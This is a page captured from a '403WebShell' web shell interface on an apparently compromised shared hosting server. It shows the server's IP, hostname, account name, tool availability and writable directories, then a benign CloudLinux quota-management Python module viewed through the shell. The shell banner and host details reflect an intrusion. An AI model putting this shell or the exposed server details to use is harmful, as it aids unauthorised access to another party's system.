Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.21.12.122
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/opt/cloudlinux/venv/lib/python3.11/site-packages/cllimits/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/opt/cloudlinux/venv/lib/python3.11/site-packages/cllimits/clquota_lib.py
# -*- coding: utf-8 -*-

# clquota_lib.py - module for interfacing with the cl-quota utility to get/set users' quotas
#
# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2019 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

import json
from typing import Dict, Optional, Tuple

from clcommon.clexception import FormattedException
from clcommon.utils import ExternalProgramFailed, run_command
from cllimits.lib import exec_utility
from cllimits.lib.utils import is_quota_active, is_quota_supported


class ClQuotaException(FormattedException):
    """
    Base class for the cl-quota related errors raised by this module.
    """


class UnexpectedClQuotaError(ClQuotaException):
    """
    Raised when we get output from cl-quota
    that cannot be parsed properly.

    :param raw_response: raw text received from cl-quota; it is embedded into
                         the error message. None when no text is available
    """
    def __init__(self, raw_response=None):
        # Adjacent string literals are concatenated as-is, so every sentence
        # except the last one must end with a space to keep them separated.
        broken_exc_message = {'message': "Unexpected response got from %(util)s. "
                                         "Raw response from cl-quota: '%(raw_response)s'. "
                                         "Please, contact CloudLinux support for help in resolving this issue.",
                              'context': {'util': 'Quota', 'raw_response': raw_response}}
        super().__init__(broken_exc_message)


class QuotaDisabledException(ClQuotaException):
    """
    Signals that quotas are switched off globally on the system.
    """
    def __init__(self):
        # The message template and its context are passed to the base class as one dict
        super().__init__({
            'message': "%(util)s is disabled",
            'context': {'util': 'Quota'},
        })


class ClQuotaLib:
    _CL_QUOTA_PATH = '/usr/bin/cl-quota'
    _REPQUOTA_PATH = '/usr/sbin/repquota'

    def __init__(self):
        # inodes limits data
        # uid --> (soft_limit, hard_limit)
        self._inode_user_limits: Optional[Dict[str, Tuple[str, str]]] = None
        self._inode_package_dict: Optional[Dict[str, Tuple[str, str]]] = None
        # Check if quota is supported
        self._is_clquota_present = None
        # Check if quota is activated
        self._is_clquota_activated = None

    def is_clquota_present(self):
        """
        Get quota presence flag
        :return: True/False - quotas present/not present
        """
        if self._is_clquota_present is None:
            self._is_clquota_present = is_quota_supported(self._CL_QUOTA_PATH, self._REPQUOTA_PATH)
        return self._is_clquota_present

    def is_clquota_activated(self):
        """
        Get quota activated flag
        :return: True/False - quotas activeted/not activeted
        """
        if self._is_clquota_activated is None:
            self._is_clquota_activated = is_quota_active(self._CL_QUOTA_PATH, self._REPQUOTA_PATH)
        return self._is_clquota_activated

    def get_inodes_limits_by_uid(self, user_id):
        """
        Retrive inodes limits by uid
        :param user_id: Supplied uid
        :return: cortege (soft_limit, hard_limit). (None, None) if governor not present or error
        """
        # Load inodes data if need
        self._load_users_info()
        uid = str(user_id)
        if uid in self._inode_user_limits:
            return self._inode_user_limits[uid]
        return self._inode_user_limits['0']

    def set_user_inodes_limits(self, uid, limits, force=False):
        """
        Set inodes limits for user uid by running cl-quota
        :param: int uid: user id, a non-negative integer
        :param: limits: new inodes limits, one of:
            - string "unlimited" or "default" (used for both limits);
            - string "soft,hard";
            - list/tuple of exactly two items (soft, hard).
            Every item of a pair must be a non-negative integer (or a string
            that converts to one) or the string "default"
        :param: bool force: save limits if even they are equal to defaults
                            (adds --force to the cl-quota command line)
        :return: None
        :raises ClQuotaException: on invalid uid/limits or when cl-quota fails.
            Errors raised while loading the current limits propagate unchanged
        """
        self._load_users_info()
        if not isinstance(uid, int) or uid < 0:
            exc_message = {'message': "User id '%(uid)s' isn't a positive integer",
                           'context': {'uid': uid}}
            raise ClQuotaException(exc_message)
        if isinstance(limits, str) and limits in ("unlimited", "default"):
            # A single keyword applies to both soft and hard limits
            limits = [limits] * 2
        else:
            # Keep the caller's value for the error message
            requested_limits = limits
            if isinstance(limits, str):
                limits = limits.split(',')
            # Exactly two values are required: anything else used to end in
            # IndexError/AttributeError or silently dropped the extra items
            if not isinstance(limits, (tuple, list)) or len(limits) != 2:
                exc_message = {'message': "Limits %(limits)s aren't acceptable.",
                               'context': {'limits': requested_limits}}
                raise ClQuotaException(exc_message)

            for limit in limits:
                try:
                    if limit != "default":
                        limit = int(limit)
                        if limit < 0:
                            raise ValueError()
                except (TypeError, ValueError) as e:
                    # TypeError covers values int() cannot accept at all (e.g. None)
                    exc_message = {'message': "Limit value '%(limit)s' isn't a positive integer or string %(default)s",
                                   'context': {'limit': limit, 'default': 'default'}}
                    raise ClQuotaException(exc_message) from e
        cmd = [self._CL_QUOTA_PATH,
               f'--user-id={uid}',
               f'--soft-limit={limits[0]}',
               f'--hard-limit={limits[1]}']
        if force:
            cmd.append("--force")
        try:
            run_command(cmd)
        except ExternalProgramFailed as e:
            raise ClQuotaException(str(e)) from e

    def set_user_inodes_limits_unlimited(self, uid):
        """
        Shortcut for set_user_inodes_limits() with the "unlimited" keyword
        :param: int uid: user id
        :return: None
        """
        # All validation and the cl-quota call happen in the generic setter
        self.set_user_inodes_limits(uid, "unlimited")

    def reset_user_inodes_limits(self, uid):
        """
        Shortcut for set_user_inodes_limits() with the "default" keyword
        :param: int uid: user id
        :return: None
        """
        # All validation and the cl-quota call happen in the generic setter
        self.set_user_inodes_limits(uid, "default")

    def _load_users_info(self):
        """
        Loads users info from cl-quota
        :return: None
        """
        # Exit if cl-quota data already loaded
        if self._inode_user_limits is not None:
            return
        # Exit if cl-quota not present or cl-quota error
        if not self.is_clquota_present() or not self.is_clquota_activated():
            raise QuotaDisabledException()
        try:
            data = self._get_quotas(['--json'])
        except ClQuotaException:
            self._inode_user_limits = None
            raise
        self._inode_user_limits = {}
        for uid, limits in data.items():
            self._inode_user_limits[uid] = (int(limits[1][1]), int(limits[2][1]))

        if '0' not in self._inode_user_limits:
            self._inode_user_limits = None
            exc_message = {'message': "There is no %(what)s found in %(where)s",
                           'context': {'what': 'default settings', 'where': f'{self._CL_QUOTA_PATH} output'}}
            raise ClQuotaException(exc_message)

    def _get_quotas(self, command):
        """
        Run cl-quota with the given arguments and return the 'items' part of
        its JSON response
        :param command: list of command line arguments for cl-quota
        :return: value stored under the 'items' key of the response
        :raises UnexpectedClQuotaError: output is not JSON, is empty, is not a
                                        JSON object or lacks the expected keys
        :raises ClQuotaException: cl-quota reported a non-success result
        """
        _, s_quota_limits = exec_utility(self._CL_QUOTA_PATH, command)
        try:
            data = json.loads(s_quota_limits)
        except (TypeError, ValueError) as e:
            raise UnexpectedClQuotaError(raw_response=s_quota_limits) from e
        # Empty or non-object JSON, or no 'result' key: keep the raw output in
        # the error instead of leaking KeyError/TypeError to the caller
        if not isinstance(data, dict) or not data or 'result' not in data:
            raise UnexpectedClQuotaError(raw_response=s_quota_limits)

        if data['result'] != 'success':
            raise ClQuotaException({
                'message': data['result'],
                'context': data.get('context', {}),
                'details': data.get('details')
            })
        try:
            return data['items']
        except KeyError as e:
            # A successful response without 'items' cannot be used either
            raise UnexpectedClQuotaError(raw_response=s_quota_limits) from e

    def reset_inodes_limits(self):
        """
        Reset inodes limits for all users to package limits
        :return:
        """
        if not self.is_clquota_present() or not self.is_clquota_activated():
            return
        exec_utility(self._CL_QUOTA_PATH, ['--sync'])

    def _load_packages_info(self):
        """
        Loads packages info from cl-quota
        :return: None
        """
        # Exit if cl-quota data already loaded
        if self._inode_package_dict is not None:
            return
        # Exit if cl-quota not present or cl-quota error
        if not self.is_clquota_present() or not self.is_clquota_activated():
            raise QuotaDisabledException()
        try:
            packages = self._get_quotas(['--json', '--all-package-limits'])
        except ClQuotaException:
            self._inode_package_dict = None
            raise
        self._inode_package_dict = {}
        for package, limits in packages.items():
            soft_limit = limits[1][1]
            if soft_limit == '-':
                soft_limit = 0
            else:
                soft_limit = int(soft_limit)

            hard_limit = limits[2][1]
            if hard_limit == '-':
                hard_limit = 0
            else:
                hard_limit = int(hard_limit)
            self._inode_package_dict[package] = {'soft': soft_limit, 'hard': hard_limit}

    def get_reseller_package_limits(self, package_name_arg):
        """
        Get inodes limits for supplied reseller and package
        :param package_name_arg: Package name. Only if reseller name is provided. If None - all packages
        :return: Packages limits dictionary: {package_name: { "soft": 100000, "hard": 200000 } }
        If package with supplied name not found, dictionary will be empty
        """
        self._load_packages_info()
        if not package_name_arg:
            # if package name not provided - return all packages
            return self._inode_package_dict
        # Package name provided
        if package_name_arg in self._inode_package_dict:
            return {package_name_arg: self._inode_package_dict[package_name_arg]}
        return {}

    def __set_error(self, param, package_name, err):
        return {'message': "%(what)s set error for package=%(package)s%(error)s",
                'context': {'what': param, 'package': package_name,
                            'error': f" [{err}]" if err else ""}}

    def set_reseller_package_limits(self, package_name, limits_to_set):
        """
        Set inodes limits for package
        Called from cloudlinux-packages set
        :param package_name: Package name
        :param limits_to_set: Limits to set, a string: soft_limit,hard_limit
        :return: None
        :raises QuotaDisabledException: quota is not present or not activated
        :raises ClQuotaException: limits_to_set is not a comma separated pair,
                                  or cl-quota exited with non-zero code or
                                  printed any output
        """
        # Fail if cl-quota not present or not activated.
        # QuotaDisabledException is a ClQuotaException carrying the same
        # "%(util)s is disabled" message, so existing handlers keep working
        if not self.is_clquota_present() or not self.is_clquota_activated():
            raise QuotaDisabledException()
        limits = limits_to_set.split(',')
        if len(limits) != 2:
            # Argument error
            raise ClQuotaException({'message': "%(util)s argument error",
                                    'context': {'util': 'cl-quota'}})
        # set quotas limits
        cl_quota_cmd = [f'--package={package_name}',
                        f'--soft-limit={limits[0]}',
                        f'--hard-limit={limits[1]}']
        ret_code, stdout = exec_utility(self._CL_QUOTA_PATH, cl_quota_cmd)
        # Any output is treated as an error even when the exit code is zero
        if ret_code != 0 or stdout:
            # Set limits error
            raise ClQuotaException(self.__set_error('Inodes limits', package_name, stdout))

    def set_package_limits_independently(self, package_name, limits):
        """
        Set inodes limits for package; soft and hard limits may be passed
        separately, only the supplied ones are sent to cl-quota
        Called from cl-syncpkgs
        :param package_name: Package name
        :param limits: Limits to set: {"inodes_soft":1000, "inodes_hard":2000}
        :return: None
        :raises ClQuotaException: quota is not present or not activated, limits
                                  are empty or contain unknown names, or
                                  cl-quota exited with non-zero code or
                                  printed any output
        """
        disabled_exc_message = {'message': "Quota is disabled"}
        # Fail if cl-quota not present or not activated
        if not self.is_clquota_present() or not self.is_clquota_activated():
            raise ClQuotaException(disabled_exc_message)
        if len(limits) == 0:
            raise ClQuotaException({'message': "Unspecified limits for cl-quota"})
        bad_limits = set(limits) - {'inodes_soft', 'inodes_hard'}
        if bad_limits:
            # Sorted so that the error text does not depend on set iteration order
            raise ClQuotaException({'message': "Incorrect limits for cl-quota: %(bad_limits)s",
                                    'context': {'bad_limits': ', '.join(sorted(bad_limits))}})
        cl_quota_cmd = [f'--package={package_name}']
        if 'inodes_soft' in limits:
            cl_quota_cmd.append(f"--soft-limit={limits['inodes_soft']}")
        if 'inodes_hard' in limits:
            cl_quota_cmd.append(f"--hard-limit={limits['inodes_hard']}")
        ret_code, stdout = exec_utility(self._CL_QUOTA_PATH, cl_quota_cmd)
        # Any output is treated as an error even when the exit code is zero
        if ret_code != 0 or stdout:
            raise ClQuotaException(self.__set_error('Inodes limits', package_name, stdout))

Youez - 2016 - github.com/yon3zu
LinuXploit